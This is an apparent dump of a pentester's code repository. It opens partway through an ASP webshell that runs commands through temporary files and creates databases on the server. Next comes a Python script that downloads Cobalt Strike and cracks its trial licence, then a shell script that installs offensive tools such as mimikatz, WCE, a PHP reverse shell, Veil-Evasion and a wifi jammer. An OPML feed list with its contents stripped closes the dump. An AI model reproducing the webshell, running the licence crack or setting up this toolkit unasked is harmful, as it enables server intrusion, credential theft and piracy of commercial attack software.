| ss=server.htmlencode(ofilelcx.readall) 139 | ss=replace(ss,vbnewline,"") 140 | jb ss 141 | ofilelcx.close 142 | call fso.deletefile(sztempfile, true) 143 | else 144 | jb "<meta http-equiv=""refresh"" content=""1"" />程序未结束,或者没有执行成功,等待刷新试试" 145 | end if 146 | if err then jb "<meta http-equiv=""refresh"" content=""1"" />程序未结束,或者没有执行成功,等待刷新试试" 147 | jb"</span></body>" 148 | response.end 149 | end select 150 | jb si 151 | function createmdb(path) 152 | si="" 153 | set c = createobject(obt(2,0)) 154 | c.create("provider=microsoft.jet.oledb.4.0;data source=" & path) 155 | set c = nothing 156 | if err.number=0 then 157 | si = si & path & "建立成功!" 158 | end if 159 | si=si&backurl 160 | echo si 161 | end function 162 | %> 163 | -------------------------------------------------------------------------------- /py/cobaltstrike_update.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | 4 | # By DarkR4y 5 | import sys 6 | import os 7 | import platform 8 | import re 9 | import urllib2 10 | import time 11 | import subprocess 12 | import shutil 13 | from optparse import OptionParser 14 | 15 | current_path = os.getcwd() 16 | current_os = platform.system() 17 | if current_os == 'Darwin': 18 | cb_folder = 'Cobalt Strike' 19 | else: 20 | cb_folder = 'cobaltstrike' 21 | base_url = 'http://www.advancedpentest.com/' 22 | download_url = 'download' 23 | changelog_url = 'releasenotes.txt' 24 | search_str = '- Cobalt Strike' 25 | vpn_need_str = 'request a direct download' 26 | header = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre" } 27 | save_name = '' 28 | jar_path = '' 29 | temp_folder = 'cb_jar_temp' 30 | crack_keyword = '$life = 21;' 31 | crack_nag_keyword = 'This is a trial version of Cobalt Strike.\\nYou have $form left of your trial.\\n\\nIf you purchased Cobalt Strike. Run the\\nUpdate program and enter your license.' 32 | 33 | #get from http://stackoverflow.com/questions/2028517/python-urllib2-progress-hook 34 | def chunk_report(bytes_so_far, chunk_size, total_size): 35 | percent = float(bytes_so_far) / total_size 36 | percent = round(percent*100, 2) 37 | sys.stdout.write("Downloaded %d of %d bytes (%0.2f%%)\r" % 38 | (bytes_so_far, total_size, percent)) 39 | 40 | if bytes_so_far >= total_size: 41 | sys.stdout.write('\n') 42 | 43 | def chunk_read(response, save_path , chunk_size= 8 * 1024 , report_hook=None): #default is 8192 44 | total_size = response.info().getheader('Content-Length').strip() 45 | total_size = int(total_size) 46 | bytes_so_far = 0 47 | # insert 48 | if os.path.exists(save_path): 49 | if os.path.getsize(save_path) == total_size: 50 | print '[***] Cobaltstrike already exists ...' 51 | return 52 | with open(save_path, 'wb') as fp: 53 | while True: 54 | chunk = response.read(chunk_size) 55 | 56 | bytes_so_far += len(chunk) 57 | 58 | if not chunk: 59 | break 60 | fp.write(chunk) 61 | if report_hook: 62 | report_hook(bytes_so_far, chunk_size, total_size) 63 | 64 | return bytes_so_far 65 | 66 | 67 | def http_down( url , save_path): 68 | request = urllib2.Request(url) 69 | request.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 (FoxPlus) Firefox/2.0.0.14') 70 | response = urllib2.urlopen(request,timeout=30) 71 | #with open(save_path, 'wb') as fp: 72 | #shutil.copyfileobj(response, fp) 73 | chunk_read(response, save_path ,report_hook=chunk_report) 74 | 75 | pass 76 | 77 | 78 | def http_get( url ): 79 | request = urllib2.Request(url) 80 | request.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 (FoxPlus) Firefox/2.0.0.14') 81 | reader = urllib2.urlopen(request,timeout=30) 82 | return reader.read() 83 | pass 84 | 85 | def month2int(m): 86 | if m == 'Jan': 87 | return 1 88 | elif m == 'Feb': 89 | return 2 90 | elif m == 'Mar': 91 | return 3 92 | elif m == 'Apr': 93 | return 4 94 | elif m == 'May': 95 | return 5 96 | elif m == 'Jun': 97 | return 6 98 | elif m == 'Jul': 99 | return 7 100 | elif m == 'Aug': 101 | return 8 102 | elif m == 'Sep': 103 | return 9 104 | elif m == 'Oct': 105 | return 10 106 | elif m == 'Nov': 107 | return 11 108 | elif m == 'Dec': 109 | return 12 110 | pass 111 | 112 | 113 | 114 | def WriteFile(file_read,file_apend , source_str , replace_str ): 115 | file_object_read = open(file_read, 'r') 116 | try: 117 | stringsave="" 118 | stringread=file_object_read.readline() 119 | while stringread: 120 | #print stringread 121 | stringread=stringread.replace(source_str, replace_str) 122 | #print 'shit - ' + stringread 123 | stringsave=stringsave+stringread 124 | stringread=file_object_read.readline() 125 | file_object_save = open(file_apend, 'w') 126 | file_object_save.write(stringsave) 127 | finally: 128 | file_object_read.close() 129 | file_object_save.close() 130 | 131 | 132 | def cracknow(): 133 | #fuck trial days limit 134 | license_file = temp_folder + os.sep + "scripts" + os.sep + "license.sl" 135 | WriteFile(license_file,license_file,crack_keyword,"$life = 9999;") 136 | WriteFile(license_file,license_file,crack_nag_keyword,'\\n Cracked by DarkRay \\n www.blackh4t.org \\n') 137 | pass 138 | 139 | def my_exec(command , shell = None): 140 | p=subprocess.Popen(command, shell=True, executable=shell ,stdout=subprocess.PIPE, stderr=subprocess.PIPE) 141 | stdoutput , erroutput = p.communicate() 142 | if erroutput == '': 143 | print 'Exec command [ %s ] successful' % (command) 144 | else: 145 | print erroutput 146 | pass 147 | 148 | def zip_file( plat ): 149 | global jar_path 150 | if plat == 'Darwin': #macosx 151 | shit_cmd = 'cd ' + current_path + os.sep + temp_folder + ' && zip -rq ../cobaltstrike.jar .' 152 | my_exec(shit_cmd , 'bash') 153 | shutil.move('cobaltstrike.jar', jar_path) 154 | shutil.rmtree(temp_folder) 155 | print '[***] Replace the origin bin sueccssfully. done!' 156 | elif plat == 'Linux': 157 | shit_cmd = 'cd ' + current_path + os.sep + temp_folder + ' && zip -rq ../cobaltstrike.jar .' 158 | my_exec(shit_cmd,'bash') 159 | shutil.move('cobaltstrike.jar', jar_path) 160 | shutil.rmtree(temp_folder) 161 | print '[***] Replace the origin bin sueccssfully. done!' 162 | pass 163 | elif plat == 'Windows': 164 | pass 165 | 166 | pass 167 | 168 | def extra_file( plat ): 169 | global save_name,jar_path 170 | path = current_path + os.sep + save_name 171 | if plat == 'Darwin' : #macosx 172 | 173 | shit_cmd = "cp -R \"/Volumes/" + cb_folder + os.sep + cb_folder + "\" \"" + current_path + os.sep + cb_folder + "\"" 174 | my_exec("hdiutil attach " + path) 175 | my_exec(shit_cmd) 176 | my_exec("hdiutil detach \"/Volumes/" + cb_folder + "\" ") 177 | jar_path = current_path + os.sep + cb_folder + os.sep + "Cobalt Strike.app/Contents/Java/cobaltstrike.jar" 178 | shit_cmd = "unzip \"" + jar_path + "\" -d " + temp_folder 179 | my_exec(shit_cmd) 180 | elif plat == 'Linux': #Linux 181 | my_exec('tar zxvf ' + path) 182 | jar_path = current_path + os.sep + cb_folder + os.sep + "cobaltstrike.jar" 183 | my_exec('unzip ' + jar_path + ' -d ' + temp_folder) 184 | pass 185 | elif plat == 'Windows': #windows 186 | pass 187 | 188 | 189 | pass 190 | 191 | def download_file( plat ): 192 | global save_name 193 | url = base_url + download_url 194 | res = http_get(url) 195 | m = re.search(vpn_need_str, res) 196 | if m is None: 197 | url_re = re.compile(r'href="(.+?)"') 198 | all_href = re.findall(url_re,res) 199 | #print all_href 200 | for i in all_href: 201 | if i[-3:] == 'zip': 202 | if plat == 'Darwin': 203 | real_url = base_url + i[:-3] + 'dmg' 204 | elif plat == 'Linux': 205 | real_url = base_url + i[:-3] + 'tgz' 206 | else: 207 | real_url = base_url + i # Win version is zip 208 | print "[***] Get the real download url is %s ..." % real_url 209 | save_name = real_url.split('/')[-1] 210 | #print save_name 211 | start_time = time.time() 212 | down_res = http_down(real_url , save_name) 213 | end_time = time.time() 214 | break 215 | if os.path.exists(save_name): 216 | print '[***] Cobaltstrike download sueccssfully. total time cost: %ds' % (end_time - start_time) 217 | else: 218 | print '[***] Something is wrong ...' 219 | 220 | else: 221 | print '[***] You need download cobaltstrike via vpn from USA ...' 222 | sys.exit() 223 | pass 224 | 225 | def get_local_version(): 226 | fname = current_path + os.sep + cb_folder + os.sep + changelog_url 227 | if os.path.isfile(fname): 228 | f = open(fname,'rb') 229 | for line in f: 230 | pos = [m.start() for m in re.finditer(search_str, line)] 231 | if pos != [0] and pos != []: 232 | realse_date = line[:pos[0] - 1 ] 233 | version = line[pos[0] + len(search_str): -2] 234 | print "current version is [%s], release date is [ %s ]" % (version , realse_date) 235 | break 236 | f.close() 237 | return version,realse_date 238 | pass 239 | else: 240 | print '[***] Wrong cobaltstrike path ...' 241 | 242 | def get_update_version(): 243 | print '[***] Fetching remote version ,plz wait ...' 244 | url = base_url + changelog_url 245 | res = http_get(url) 246 | f = open('tmp.txt','wb') 247 | f.write(res) 248 | f.close() 249 | fr = open('tmp.txt','rb') 250 | for line in fr: 251 | pos = [m.start() for m in re.finditer(search_str, line)] 252 | if pos != [0] and pos != []: 253 | realse_date = line[:pos[0] - 1 ] 254 | version = line[pos[0] + len(search_str): -2] 255 | print "update version is [%s], release date is [ %s ]" % (version , realse_date) 256 | break 257 | fr.close() 258 | os.remove(current_path + os.sep + 'tmp.txt') 259 | return version,realse_date 260 | pass 261 | 262 | def install(): 263 | print '[***] Searching the cobaltstrike download url ...' 264 | download_file(current_os) 265 | extra_file(current_os) 266 | cracknow() 267 | zip_file(current_os) 268 | pass 269 | 270 | 271 | def compare_date( date1 , date2): 272 | d1,m1,y1 = date1.split(' ') 273 | d2,m2,y2 = date2.split(' ') 274 | m1 = month2int(m1) 275 | m2 = month2int(m2) 276 | if y1 >= y2: 277 | if m1 >= m2: 278 | if d1 >= d2: 279 | return True 280 | else: 281 | return False 282 | 283 | pass 284 | 285 | def update(): 286 | old_v , old_date = get_local_version() 287 | new_v , new_date = get_update_version() 288 | if float(old_v) > float(new_v): 289 | print '[***] Nothing to update ...' 290 | elif float(old_v) == float(new_v): 291 | if compare_date(old_date , new_date) == True: # old_date > new_date 292 | print '[***] Nothing to update ...' 293 | else: 294 | install() 295 | else: 296 | install() 297 | pass 298 | 299 | ''' Main Entry ''' 300 | def main(argv=None): # 301 | '''Hello Opt''' 302 | parser = OptionParser() 303 | parser.add_option("-i", "--install", action="store_true", 304 | dest="install", 305 | default=False, 306 | help="install cobaltstrike to current folder") 307 | parser.add_option("-u", "--update", action="store_true", 308 | dest="update", 309 | default=False, 310 | help="update cobaltstrike") 311 | parser.add_option("-c", "--crack", action="store_true", 312 | dest="crack", 313 | default=False, 314 | help="just crack the cobaltstrike!") 315 | 316 | (options, args) = parser.parse_args() 317 | 318 | if options.install==True: 319 | print '[***] Cobalt Strike Installer' 320 | install() 321 | 322 | if options.update ==True: 323 | print '[***] Cobalt Strike Updater' 324 | update() 325 | 326 | 327 | 328 | 329 | 330 | if __name__ == "__main__": 331 | main() 332 | -------------------------------------------------------------------------------- /sh/pentest4ubuntu.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | #origin from - https://www.z3ncode.net/?p=55 | modifiedy by darkr4y 3 | 4 | echo "preliminary questions regarding user-rights" 5 | cd ~/ 6 | clear 7 | read -p "Please enter your username, this will help me fix permissions:" myname 8 | clear 9 | 10 | echo "what would be your prefered directory name for the tools? no slashes pls" 11 | cd ~/ 12 | clear 13 | read -p "Please enter the directory name you would like:" mydirectory 14 | clear 15 | 16 | #echo "integrated firewall activation" 17 | #ufw enable 18 | 19 | echo "system updates" 20 | apt-get update -y 21 | apt-get upgrade -y 22 | apt-get dist-upgrade -y 23 | 24 | echo "removal of default useless apps." 25 | apt-get remove -y --purge rhythmbox ekiga totem* ubuntu-one* unity-lens-music unity-lens-friends unity-lens-photos unity-lens-video transmission* thunderbird* apport 26 | 27 | echo "removal of NSA PRISM search tools provided by unity." 28 | gsettings set com.canonical.Unity.Lenses disabled-scopes "['more_suggestions-amazon.scope', 'more_suggestions-u1ms.scope', 'more_suggestions-populartracks.scope', 'music-musicstore.scope', 'more_suggestions-ebay.scope', 'more_suggestions-ubuntushop.scope', 'more_suggestions-skimlinks.scope']" 29 | gsettings set com.canonical.Unity.Lenses remote-content-search none 30 | 31 | echo "disable guest user and remote logon" 32 | sh -c 'printf "[SeatDefaults]\ngreeter-show-remote-login=false\n" >/usr/share/lightdm/lightdm.conf.d/50-no-remote-login.conf' 33 | sh -c 'printf "[SeatDefaults]\nallow-guest=false\n" >/usr/share/lightdm/lightdm.conf.d/50-no-guest.conf' 34 | 35 | echo "installation of normal hacking tools and other ubuntu goodies for laptops" 36 | apt-get install -y nmap nbtscan wireshark tcpdump openjdk-6-jre openjdk-7-jre openvpn ettercap-text-only ghex pidgin pidgin-otr traceroute lft gparted autopsy subversion git gnupg htop ssh libimage-exiftool-perl aptitude p7zip-full proxychains curl terminator irssi gnome-tweak-tool libtool build-essential bum rdesktop sshfs bzip2 extundelete gimp iw ldap-utils ntfs-3g samba-common samba-common-bin steghide whois python-dev libpcap-dev aircrack-ng gnome-screenshot eog bundler ruby1.9.1 ruby1.9.1-dev libssl1.0.0 libssl-dev laptop-mode-tools python-nfqueue python-scapy openconnect libgmp3-dev libpcap-dev gengetopt byacc flex cmake libpcre3-dev libidn11-dev ophcrack gdb stunnel socat libcurl4-openssl-dev chromium-browser swftools hping3 tcpreplay tcpick python-setuptools gufw vncviewer python-urllib3 libnss3-1d libxss1 scalpel foremost unrar rar secure-delete vmfs-tools 37 | 38 | echo "installation of other tools" 39 | apt-get install -y gstreamer1.0-plugins-bad qemu-kvm qemu-utils qemu-common aqemu gvfs-fuse xdg-user-dirs gnome-applets* powertop flashplugin-installer unity-tweak-tool 40 | 41 | echo "installation of googlechrome" 42 | wget -nc https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 43 | dpkg -i google-chrome-stable_current_amd64.deb 44 | rm google-chrome-stable_current_amd64.deb 45 | 46 | echo "create default tools directory" 47 | mkdir ~/$mydirectory 48 | cd ~/$mydirectory/ 49 | mkdir ~/$mydirectory/cheatsheets 50 | mkdir ~/$mydirectory/exploits 51 | cd ~/$mydirectory/exploits 52 | 53 | echo "installation of android sdk" 54 | mkdir ~/$mydirectory/mobile 55 | cd ~/$mydirectory/mobile 56 | wget -nc http://dl.google.com/android/android-sdk_r22.6-linux.tgz 57 | tar -xvf android-sdk_r22.6-linux.tgz 58 | rm -rf android-sdk_r22.6-linux.tgz 59 | cd ~/$mydirectory 60 | 61 | 62 | 63 | echo "gather the metasploit repository" 64 | cd ~/$mydirectory/exploits 65 | git clone https://github.com/rapid7/metasploit-framework.git 66 | cd ~/$mydirectory/exploits/metasploit-framework 67 | 68 | echo "installation of metasploit requirements" 69 | apt-get install -y build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev ruby1.9.3 nmap 70 | 71 | echo "installation of metasploit required gems" 72 | gem install wirble sqlite3 bundler rake 73 | bundle install 74 | 75 | echo "wordlists gathering" 76 | cd ~/ 77 | mkdir ~/$mydirectory/wordlists 78 | cd ~/$mydirectory/wordlists 79 | wget -nc http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 80 | 81 | echo "install burp" 82 | cd ~/$mydirectory 83 | mkdir ~/$mydirectory/webapps 84 | mkdir ~/$mydirectory/webapps/burp_proxy 85 | cd ~/$mydirectory/webapps/burp_proxy 86 | wget -nc http://portswigger.net/burp/burpsuite_free_v1.6.jar 87 | cd ~/$mydirectory 88 | 89 | echo "install cookie cadger" 90 | mkdir ~/$mydirectory/network 91 | mkdir ~/$mydirectory/network/sidejacking 92 | cd ~/$mydirectory/network/sidejacking 93 | wget -nc https://www.cookiecadger.com/files/CookieCadger-1.06.jar 94 | cd ~/$mydirectory 95 | 96 | echo "install enum4linux" 97 | mkdir ~/$mydirectory/network/enum4linux 98 | cd ~/$mydirectory/network/enum4linux 99 | wget https://labs.portcullis.co.uk/download/enum4linux-0.8.9.tar.gz 100 | tar -xvf enum4linux-0.8.9.tar.gz 101 | rm -rf enum4linux-0.8.9.tar.gz 102 | cd ~/$mydirectory 103 | 104 | echo "install torbrowser" 105 | #darknet tor 106 | mkdir ~/$mydirectory/network/torbrowser 107 | cd ~/$mydirectory/network/torbrowser 108 | wget -nc https://www.torproject.org/dist/torbrowser/3.5/tor-browser-linux64-3.5_en-US.tar.xz 109 | tar -xvf tor-browser-linux64-3.5_en-US.tar.xz 110 | rm -rf tor-browser-linux64-3.5_en-US.tar.xz 111 | cd ~/$mydirectory 112 | 113 | echo "gathering phpreverseshell" 114 | mkdir ~/$mydirectory/network/reverse_shells 115 | cd ~/$mydirectory/network/reverse_shells 116 | wget -nc http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz 117 | tar -xvf ~/$mydirectory/network/reverse_shells/php-reverse-shell-1.0.tar.gz 118 | rm -rf ~/$mydirectory/network/reverse_shells/php-reverse-shell-1.0.tar.gz 119 | cd ~/$mydirectory 120 | 121 | #wcedigest 122 | echo "install wcedigest" 123 | mkdir ~/$mydirectory/escalation 124 | mkdir ~/$mydirectory/escalation/wcedigest 125 | cd ~/$mydirectory/escalation/wcedigest 126 | wget -nc http://www.ampliasecurity.com/research/wce_v1_3beta.tgz 127 | tar -xvf wce_v1_3beta.tgz 128 | rm -rf wce_v1_3beta.tgz 129 | cd ~/$mydirectory 130 | 131 | #mimikatz 132 | echo "install mimikatz" 133 | mkdir ~/$mydirectory/escalation/mimikatz 134 | cd ~/$mydirectory/escalation/mimikatz 135 | wget -nc http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip 136 | unzip -o mimikatz_trunk.zip 137 | rm -rf mimikatz_trunk.zip 138 | cd ~/$mydirectory 139 | 140 | #memory forensics tools 141 | echo "install volatility framework" 142 | mkdir ~/$mydirectory/forensics 143 | mkdir ~/$mydirectory/forensics/volatility 144 | cd ~/$mydirectory/forensics/volatility 145 | wget -nc https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz 146 | cd ~/$mydirectory/forensics/volatility 147 | tar -xvf volatility-2.3.1.tar.gz 148 | rm -rf volatility-2.3.1.tar.gz 149 | cd ~/$mydirectory 150 | 151 | #recon dns 152 | echo "install DNSmap" 153 | mkdir ~/$mydirectory/recon 154 | mkdir ~/$mydirectory/recon/dnsmap 155 | cd ~/$mydirectory/recon/dnsmap 156 | wget -nc https://dnsmap.googlecode.com/files/dnsmap-0.30.tar.gz 157 | tar -xvf dnsmap-0.30.tar.gz 158 | rm -rf dnsmap-0.30.tar.gz 159 | cd ~/$mydirectory 160 | 161 | 162 | #webapp vulnerability assessors 163 | echo "install subgraph vega" 164 | mkdir ~/$mydirectory/webapps/vega 165 | cd ~/$mydirectory/webapps/vega 166 | wget -nc http://subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip 167 | unzip -o VegaBuild-linux.gtk.x86_64.zip 168 | rm -rf VegaBuild-linux.gtk.x86_64.zip 169 | cd ~/$mydirectory 170 | 171 | echo "install oclhashcat" 172 | mkdir ~/$mydirectory/pwcracking 173 | mkdir ~/$mydirectory/pwcracking/oclhashcat 174 | cd ~/$mydirectory/pwcracking/oclhashcat 175 | wget -nc http://hashcat.net/files/oclHashcat-1.01.7z 176 | p7z oclHashcat-1.01.7z 177 | rm -rf oclHashcat-1.01.7z 178 | cd ~/$mydirectory 179 | 180 | echo "install cryptohaze multiforcer needs opencl" 181 | mkdir ~/$mydirectory/pwcracking/cryptohaze_multiforcer 182 | cd ~/$mydirectory/pwcracking/cryptohaze_multiforcer 183 | wget -nc "http://downloads.sourceforge.net/project/cryptohaze/New-Multiforcer-Linux_x64_1_31.tar.bz2?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcryptohaze%2Ffiles%2F&ts=1391475227&use_mirror=superb-dca2" -O New-Multiforcer-Linux_x64_1_31.tar.bz2 184 | bunzip -o2 New-Multiforcer-Linux_x64_1_31.tar.bz2 185 | tar -xvf New-Multiforcer-Linux_x64_1_31.tar.bz2 186 | rm -rf New-Multiforcer-Linux_x64_1_31.tar.bz2 187 | cd ~/$mydirectory 188 | 189 | #Multiple web-backdoors 190 | echo "install fuzzdb" 191 | mkdir ~/$mydirectory/webapps/fuzzdb 192 | cd ~/$mydirectory/webapps/fuzzdb 193 | svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only 194 | cd ~/$mydirectory 195 | 196 | #web-app tools 197 | echo "install sqlmap and other tools from github" 198 | cd ~/$mydirectory/webapps 199 | git clone https://github.com/vs4vijay/heartbleed.git 200 | git clone https://github.com/beefproject/beef 201 | git clone https://github.com/Arachni/arachni.git 202 | cd ~/$mydirectory/webapps/arachni 203 | bundle install 204 | cd ~/$mydirectory/webapps 205 | git clone https://github.com/wpscanteam/wpscan.git 206 | git clone https://github.com/sullo/nikto.git 207 | git clone https://github.com/gabtremblay/tachyon.git 208 | git clone https://github.com/sqlmapproject/sqlmap.git 209 | cd ~/$mydirectory 210 | 211 | #tools for social engineering 212 | mkdir ~/$mydirectory/social_engineering 213 | cd ~/$mydirectory/social_engineering 214 | git clone https://github.com/trustedsec/social-engineer-toolkit.git 215 | cd ~/$mydirectory 216 | 217 | #tools for mitm/network (yersinia to test) 218 | cd ~/$mydirectory/network/ 219 | git clone https://github.com/DanMcInerney/creds.py.git 220 | git clone https://github.com/nccgroup/vlan-hopping.git 221 | git clone https://github.com/tomac/yersinia.git 222 | git clone https://github.com/Hood3dRob1n/Reverser.git 223 | cd ~/$mydirectory 224 | 225 | #VulnDB 226 | mkdir ~/$mydirectory/vulndb 227 | cd ~/$mydirectory/vulndb 228 | git clone https://github.com/toolswatch/vFeed.git 229 | cd ~/$mydirectory 230 | 231 | #all the exploits from exploit-db 232 | cd ~/$mydirectory/exploits 233 | git clone https://github.com/offensive-security/exploit-database 234 | cd ~/$mydirectory 235 | 236 | #tools for privescalation 237 | cd ~/$mydirectory/escalation 238 | git clone https://github.com/pentestgeek/smbexec.git 239 | git clone https://github.com/rebootuser/LinEnum.git 240 | cd ~/$mydirectory 241 | 242 | #framework veil ASM 243 | cd ~/$mydirectory/exploits 244 | git clone https://github.com/Veil-Framework/Veil-Evasion.git 245 | 246 | #tools for mitm lan 247 | cd ~/$mydirectory/network 248 | git clone https://github.com/DanMcInerney/LANs.py.git 249 | git clone https://github.com/SpiderLabs/Responder.git 250 | cd ~/$mydirectory 251 | 252 | #recon 253 | cd ~/$mydirectory/recon 254 | git clone https://github.com/hatRiot/clusterd.git 255 | cd ~/$mydirectory 256 | 257 | #cheatsheets 258 | cd ~/$mydirectory/cheatsheets 259 | git clone https://github.com/aramosf/sqlmap-cheatsheet.git 260 | cd ~/$mydirectory 261 | 262 | #portscanners 263 | cd ~/$mydirectory/network 264 | git clone git://github.com/zmap/zmap.git 265 | cd ~/$mydirectory/network/zmap 266 | cmake -DENABLE_HARDENING=ON 267 | make 268 | make install 269 | cd ~/$mydirectory 270 | 271 | #tools to ident hash 272 | mkdir ~/$mydirectory/crypto 273 | cd ~/$mydirectory/crypto 274 | git clone https://github.com/SmeegeSec/HashTag.git 275 | cd ~/$mydirectory 276 | 277 | #tools for passthehash 278 | cd ~/$mydirectory/network 279 | git clone https://github.com/inquisb/keimpx 280 | cd ~/$mydirectory 281 | 282 | #tools for mitm vlan hop 283 | cd ~/$mydirectory/network 284 | git clone https://github.com/nccgroup/vlan-hopping.git 285 | cd ~/$mydirectory 286 | 287 | #tools for portscanning 288 | cd ~/$mydirectory/network 289 | git clone https://github.com/robertdavidgraham/masscan.git 290 | cd ~/$mydirectory 291 | 292 | #tools for recon 293 | cd ~/$mydirectory/recon 294 | git clone https://github.com/urbanadventurer/WhatWeb.git 295 | cd ~/$mydirectory 296 | 297 | #xss web-app 298 | cd ~/$mydirectory/webapps 299 | git clone https://github.com/spinkham/skipfish.git 300 | cd ~/$mydirectory/webapps/skipfish 301 | sudo make 302 | git clone https://github.com/mandatoryprogrammer/xssless.git 303 | cd ~/$mydirectory 304 | 305 | #wifi et wps 306 | mkdir ~/$mydirectory/wireless 307 | cd ~/$mydirectory/wireless 308 | git clone https://github.com/DanMcInerney/wifijammer.git 309 | git clone https://github.com/derv82/wifite.git 310 | git clone https://github.com/bdpurcell/bully.git 311 | cd ~/$mydirectory/wireless/bully/src 312 | make 313 | make install 314 | cd ~/$mydirectory 315 | 316 | echo "masscan" 317 | cd ~/$mydirectory/network/masscan 318 | make 319 | cd ~/$mydirectory 320 | 321 | echo "requirements for wpscan" 322 | cd ~/$mydirectory/webapps/wpscan 323 | bundle install 324 | cd ~/$mydirectory 325 | 326 | echo "install WSattacker" 327 | mkdir ~/$mydirectory/webapps/ws_attacker 328 | cd ~/$mydirectory/webapps/ws_attacker 329 | wget -nc "http://downloads.sourceforge.net/project/ws-attacker/WS-Attacker%201.3/WS-Attacker-1.3.zip?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fws-attacker%2F&ts=1391476709&use_mirror=iweb" -O WS-Attacker-1.3.zip 330 | unzip -o WS-Attacker-1.3.zip 331 | rm -rf WS-Attacker-1.3.zip 332 | cd ~/$mydirectory 333 | 334 | echo "OWASP ZAP" 335 | mkdir ~/$mydirectory/webapps/zap_proxy 336 | cd ~/$mydirectory/webapps/zap_proxy 337 | wget -nc "http://downloads.sourceforge.net/project/zaproxy/2.3.0/ZAP_2.3.0.1_Linux.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fzaproxy%2Ffiles%2F2.3.0%2F&ts=1397474662&use_mirror=iweb" -O ZAP_2.3.0.1_Linux.tar.gz 338 | tar -xvf ZAP_2.3.0.1_Linux.tar.gz 339 | rm -rf ZAP_2.3.0.1_Linux.tar.gz 340 | cd ~/$mydirectory 341 | 342 | echo "windows tools just in case no internets" 343 | mkdir ~/$mydirectory/windows 344 | mkdir ~/$mydirectory/windows/win_tools 345 | cd ~/$mydirectory/windows/win_tools 346 | wget -nc http://www.oxid.it/downloads/ca_setup.exe 347 | wget -nc http://www.ollydbg.de/odbg200.zip 348 | wget -nc http://www.ollydbg.de/odbg110.zip 349 | wget -nc http://out7.hex-rays.com/files/idafree50.exe 350 | 351 | 352 | echo "correcting user-rights" 353 | cd ~/ 354 | clear 355 | chown -R $myname:$myname ~/$mydirectory 356 | 357 | echo "clean packages downloaded" 358 | aptitude autoclean -y 359 | -------------------------------------------------------------------------------- /export.opml: -------------------------------------------------------------------------------- 1 | <opml version="1.1"> 2 | <head> 3 | <title>FeedDemon Subscriptions 4 | Thu, 17 Apr 2014 01:25:37 GMT 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 141 | 142 | 143 | 144 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | --------------------------------------------------------------------------------